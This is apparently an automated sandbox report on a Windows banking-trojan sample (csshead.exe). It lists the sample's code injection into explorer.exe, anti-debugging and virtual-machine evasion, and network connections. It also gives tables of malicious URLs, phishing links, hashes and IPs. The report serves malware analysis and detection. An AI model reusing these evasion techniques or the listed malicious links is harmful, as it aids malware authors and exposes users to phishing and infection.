CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco0_2_00419D20
Creates files inside the user directoryShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821Jump to behavior
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exeProcess created: C:\Windows\explorer.exeJump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Menu0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Bitmap0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Edit0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: WAV0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: Profile0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: .icm0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: open0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exeCommand line argument: @G@0_2_00419D20
Reads software policiesShow sources
Source: C:\Users\user\Desktop\csshead.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: csshead.exevirustotal: Detection: 46%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\csshead.exe 'C:\Users\user\Desktop\csshead.exe'
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: Ihs.pdb source: csshead.exe
Source: Binary string: C:\As\Release\2000s.pdb source: csshead.exe

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Users\user\Desktop\csshead.exeMemory written: PID: 3160 base: B0000 value: 43Jump to behavior
Source: C:\Users\user\Desktop\csshead.exeMemory written: PID: 3160 base: 3D81E8 value: 00Jump to behavior
Source: C:\Users\user\Desktop\csshead.exeMemory written: PID: 3160 base: EC46B0 value: 55Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\csshead.exeMemory written: C:\Windows\explorer.exe base: EC46B0Jump to behavior
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00404406 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00404406
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004041C8 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,0_2_004041C8

Anti Debugging:

barindex
Found API chain indicative of debugger detectionShow sources
Source: C:\Users\user\Desktop\csshead.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-19518
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004010B4 rdtsc 0_2_004010B4
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00406D40 IsDebuggerPresent,0_2_00406D40
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004239DD VirtualProtect ?,-00000001,00000104,?0_2_004239DD
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401928 LoadLibraryA,GetProcAddress,0_2_00401928
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004024F8 mov eax, dword ptr fs:[00000030h]0_2_004024F8
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_01821560 mov eax, dword ptr fs:[00000030h]0_2_01821560
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_01823134 mov eax, dword ptr fs:[00000030h]0_2_01823134
Source: C:\Windows\explorer.exeCode function: 1_2_007C24F8 mov eax, dword ptr fs:[00000030h]1_2_007C24F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00401460 GetProcessHeap,RtlReAllocateHeap,0_2_00401460
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0042CA48 SetUnhandledExceptionFilter,0_2_0042CA48
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00424FEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00424FEB
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00429814 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00429814

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00406B18 0_2_00406B18
Source: C:\Windows\explorer.exeCode function: 1_2_007C6B18 1_2_007C6B18
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Windows\explorer.exeCode function: 1_2_007C6DB0 GetTickCount,Sleep,GetTickCount,1_2_007C6DB0
Source: C:\Windows\explorer.exeCode function: 1_2_007C6DC8 GetTickCount,Sleep,GetTickCount,1_2_007C6DC8
Found evasive API chain (may execute only at specific dates)Show sources
Source: C:\Windows\explorer.exeEvasive API call chain: GetSystemTime,DecisionNodes,Sleepgraph_1-4722
Contains capabilities to detect virtual machinesShow sources
Source: C:\Users\user\Desktop\csshead.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004010B4 rdtsc 0_2_004010B4
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\explorer.exeThread delayed: delay time: 300000Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Windows\explorer.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-4722
Found evasive API chain (may stop execution after accessing registry keys)Show sources
Source: C:\Windows\explorer.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4666
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\csshead.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-18509
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\Desktop\csshead.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18759
Source: C:\Windows\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-4553
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\explorer.exe TID: 3080Thread sleep count: 297 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 3080Thread sleep time: -297000s >= -60000sJump to behavior
Source: C:\Windows\explorer.exe TID: 3080Thread sleep time: -300000s >= -60000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\explorer.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00403988 FindFirstFileA,FindClose,0_2_00403988
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405640
Source: C:\Windows\explorer.exeCode function: 1_2_007C5640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,1_2_007C5640
Source: C:\Windows\explorer.exeCode function: 1_2_007C3988 FindFirstFileA,FindClose,1_2_007C3988
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco0_2_00419D20
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: csshead.exe, 00000000.00000002.27490890262.00599000.00000004.sdmpBinary or memory string: vmware
Program exit pointsShow sources
Source: C:\Users\user\Desktop\csshead.exeAPI call chain: ExitProcess graph end nodegraph_0-18510
Source: C:\Users\user\Desktop\csshead.exeAPI call chain: ExitProcess graph end nodegraph_0-19555

Hooking and other Techniques for Hiding and Protection:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 212.92.98.68 187Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 23.10.249.152 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 216.58.210.14 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 216.58.210.4 187Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00420B80 GetWindowLongA,SendMessageA,SendMessageA,GetWindowLongA,IsWindowVisible,IsIconic,ShowWindow,SendMessageA,GetWindowLongA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,0_2_00420B80

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
May initialize a security null descriptorShow sources
Source: csshead.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00406C6C cpuid 0_2_00406C6C
Queries device information via Setup APIShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00406EEC LoadLibraryA,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyA,CharLowerBuffA,SetupDiDestroyDeviceInfoList,0_2_00406EEC
Queries the installation date of WindowsShow sources
Source: C:\Users\user\Desktop\csshead.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the product ID of WindowsShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_00405468 GetSystemTime,0_2_00405468
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_0041C95B LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,WaitForSingleObject,WaitNamedPipeA,CreateFileA,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,CloseHandle,CloseHandle,WriteFile,ReadFile,WriteFile,CloseHandle,ReadFile,CloseHandle,LookupAccountNameA,LookupAccountNameA,GetLastError,GetLastError,GetLastError,GetLastError,LocalAlloc,LocalAlloc,GetLastError,LocalAlloc,GetLastError,LookupAccountNameA,GetLastError,LocalFree,SetStretchBltMode,SetStretchBltMode,SetAbortProc,DrawFrameControl,LoadImageA,SetWindowLongA,SetWindowLongA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFile,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,GetDlgItem,OleInitialize,RegisterDragDrop,GetTopWindow,RevokeDragDrop,OleUninitialize,SetMenuItemInfoA,GetLastError,DrawMenuBar,GetMenuItemInfoA,BeginPaint,EndPaint,GetClientRect,EnumDateFormatsA,lstrcmpi,lstrcmpi,lstrcmpi0_2_0041C95B
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\csshead.exeCode function: 0_2_004064BC GetVersionExA,0_2_004064BC
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Simulations

Behavior and APIs

TimeTypeDescription
14:00:01API Interceptor95x Sleep call for process: csshead.exe modified
14:05:55API Interceptor1x Sleep call for process: explorer.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
csshead.exe47%virustotalBrowse
csshead.exe100%AviraTR/Spy.Bebloh.ymgcn

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLink
0.2.csshead.exe.50000.0.unpack100%AviraTR/Crypt.XPACK.Gen
1.2.explorer.exe.490000.5.unpack100%AviraTR/Crypt.XPACK.Gen
1.2.explorer.exe.7c0000.6.unpack100%AviraTR/Crypt.XPACK.Gen
0.2.csshead.exe.400000.1.unpack100%AviraHEUR/AGEN.1023574
0.0.csshead.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen
0.1.csshead.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen

Domains

SourceDetectionScannerLabelLink
a771.dscq.akamai.net0%virustotalBrowse
wigermexir.com1%virustotalBrowse
a279.dscq.akamai.net0%virustotalBrowse
www.google.com1%virustotalBrowse

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000001.00000002.28504861757.007C0000.00000040.sdmpIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT
00000000.00000002.27490223943.00050000.00000004.sdmpIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT

Unpacked PEs

SourceRuleDescriptionAuthor
0.2.csshead.exe.400000.1.unpackIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT
0.2.csshead.exe.50000.0.unpackIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT
1.2.explorer.exe.7c0000.6.unpackIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT
1.2.explorer.exe.7c0000.6.raw.unpackIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT
0.2.csshead.exe.50000.0.raw.unpackIMPLANT_4_v10BlackEnergy / Voodoo Bear Implant by APT28US CERT

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
23.10.249.152https://t.co/mX5kIyjXWjmaliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgRB5GP6xrDWM%2FfqtbTzJGhD1w%3D%3D
http://tiny.ie/sweetpromingsmaliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgMe4TxJPXSOfP%2BiFxDSo%2F8npA%3D%3D
https://anthonyandebony.com/wordonline/authredirect/file.php?login=mnichols@rksolutions.commaliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgMF%2Bk32tvikCVu1JuLOF6zwag%3D%3D
http://alpineinternet.com.aumaliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgSJHUHuSc0DYAMw4lciTWik9Q%3D%3D
Palomar Health Secured Doc..pdfe525aefada56291068e0d1c4b60a64a2d4b33b0e1b8a5597fe8bdd32264d3ba8maliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgPTURsDs2g8rqllx9GwQvyPdQ%3D%3D
https://alumni.uigm.ac.id/?path=barry.maxer@us.tel.commaliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgOWfUS7LvWMXy3myg%2BE7JDIgQ%3D%3D
AnalyticsEdgeBasicInstaller.execc72c28b826cc388cdea083ad75787249bbcaeb9f1c6c11477b8e9eaf3178878maliciousBrowse
  • ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgPls2JO%2FK9sRfq%2FXlNl5hxS%2FA%3D%3D

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
a771.dscq.akamai.netsample.exe574ea6b2d1e07fe7d7005b413bef53c86a0fbf6539b942e5108ac33b931c446amaliciousBrowse
  • 23.10.249.171
Account_Verificatlon_Form.pdf843c8cbc0898b9b6ba2811a078a5a7ecc123e75e50f52e33c7e710ee64e28326maliciousBrowse
  • 95.100.96.232
NEURILINK DOCUMENT. 20062018.pdf83d50d985b290c661318c7d2bce9793ae753efb54ac69730aa35e7be145dfc98maliciousBrowse
  • 23.10.249.171
http://trip-suggest.com/fiji/northern/urata/maliciousBrowse
  • 23.10.249.171
https://t.co/mX5kIyjXWjmaliciousBrowse
  • 23.10.249.152
http://tiny.ie/sweetpromingsmaliciousBrowse
  • 23.10.249.152
https://tiny.ie/zrswjNGmaliciousBrowse
  • 23.10.249.171
https://anthonyandebony.com/wordonline/authredirect/file.php?login=mnichols@rksolutions.commaliciousBrowse
  • 23.10.249.152
Qg1yzWjpc7.doc51e94976e2c22b08ee1c875499e7113cf08f5b558e16e199689ed9bd536dd99cmaliciousBrowse
  • 23.10.249.171
https://tiny.cc/t8j3uymaliciousBrowse
  • 2.18.212.56
http://wasosamydinag.tk/index/?1631501756857maliciousBrowse
  • 23.10.249.171
http://rgho.st/7jXZr4XY6maliciousBrowse
  • 23.10.249.171
http://sampleforms.org/maliciousBrowse
  • 23.10.249.171
Palomar Health Secured Doc..pdfe525aefada56291068e0d1c4b60a64a2d4b33b0e1b8a5597fe8bdd32264d3ba8maliciousBrowse
  • 23.10.249.171
http://partypoker.commaliciousBrowse
  • 23.10.249.152
http://ak.imgfarm.com/images/nocache/vicinio/installers/v2/226354149.TTAB02.1/nsis/866200-TTAB02.1/180517175322204/msniDirectionsAce/DirectionsAce.7c07b714bb0641cf955969e805020843.exemaliciousBrowse
  • 95.100.96.226
https://alumni.uigm.ac.id/?path=barry.maxer@us.tel.commaliciousBrowse
  • 23.10.249.152
AnalyticsEdgeBasicInstaller.execc72c28b826cc388cdea083ad75787249bbcaeb9f1c6c11477b8e9eaf3178878maliciousBrowse
  • 23.10.249.152
http://civiljour.tkmaliciousBrowse
  • 2.18.212.33
a1621.g.akamai.netprice_list.exe6f11c4bd4bef91e441b05ed7e3062a7abc88e5185b3da54bfbe022aa3ff4b24dmaliciousBrowse
  • 95.100.248.144
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 95.100.248.144
SAMPLES.exeb3aac810dc97b2ed6a957294e1112e8e2b54993615ecbbb5d38b115af6591cbcmaliciousBrowse
  • 2.21.246.16
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 95.100.248.144
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 88.221.112.145
new document.pdf...exe92dc2219857df05bcf531f922c66cb423b731f67e078a98b0895d0bb7d85e9damaliciousBrowse
  • 88.221.112.203
SHIPPING-DOCUMENTS.DHL.989.exe7bb12d910328c52da8d3f235f2481d99e8c0be6675e9f3d1652595178337227cmaliciousBrowse
  • 95.100.248.144
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 2.16.4.178
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 95.100.248.144
EMS Tracking Digit.exe6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848maliciousBrowse
  • 2.21.246.18
SHIPPING-DOCUMENTS.DHL.989.exe7bb12d910328c52da8d3f235f2481d99e8c0be6675e9f3d1652595178337227cmaliciousBrowse
  • 95.100.248.144
Invoice-45504-Apr-25-2017-US-071058.pdf7a9ddae5279e0692bb58e7a5afd9be97800a92004d99af03f910ea5a4dbebe29maliciousBrowse
  • 2.21.246.18
a279.dscq.akamai.netsample.exe574ea6b2d1e07fe7d7005b413bef53c86a0fbf6539b942e5108ac33b931c446amaliciousBrowse
  • 23.10.249.146
Account_Verificatlon_Form.pdf843c8cbc0898b9b6ba2811a078a5a7ecc123e75e50f52e33c7e710ee64e28326maliciousBrowse
  • 23.10.249.146
Docusign.pdfea6a61e73f613bcd95f2785457887519dce565c294358f765f2ad6b05f3dff20maliciousBrowse
  • 23.10.249.146
https://download.filezilla-project.org/client/FileZilla_3.34.0_win64-setup_bundled.exemaliciousBrowse
  • 23.10.249.146
NEURILINK DOCUMENT. 20062018.pdf83d50d985b290c661318c7d2bce9793ae753efb54ac69730aa35e7be145dfc98maliciousBrowse
  • 23.10.249.146
http://trip-suggest.com/fiji/northern/urata/maliciousBrowse
  • 23.10.249.168
https://t.co/mX5kIyjXWjmaliciousBrowse
  • 23.10.249.168
http://forfat4burns.world/nose.php?a=415853&c=wl_con&s=10051maliciousBrowse
  • 23.10.249.146
Scan0011.pdf98f9a18c61696ca54ff78ed287b814fbf23327689afd950ad4a90f833b8ee6aamaliciousBrowse
  • 23.10.249.146
https://bataviasecurity.co.id/encoreurology/RRSalypsopoAmazonas001share/index.phpmaliciousBrowse
  • 23.10.249.146
GestVision, Inc..pdf563189ad7e01d1ccbe2d66db83b23ddb40581c7e893d638cd16a69ae7a8d0e6cmaliciousBrowse
  • 23.10.249.168
FileZilla_3.34.0_win64-setup_bundled.exe3129fd5421c1a71c0673f4cae5349b4a98d4e93da9c41ace1bcacdc9ebf9c0ffmaliciousBrowse
  • 23.10.249.168
http://tiny.ie/sweetpromingsmaliciousBrowse
  • 23.10.249.168
https://bmordi.es/cgi-ssl/storage/e-faxed-scan/access/draw9901/8269380-attachment-microsoftonline.office365286r7429428outlook-sharepoint_document.psf/maliciousBrowse
  • 23.10.249.146
https://tiny.ie/zrswjNGmaliciousBrowse
  • 23.10.249.168
https://anthonyandebony.com/wordonline/authredirect/file.php?login=mnichols@rksolutions.commaliciousBrowse
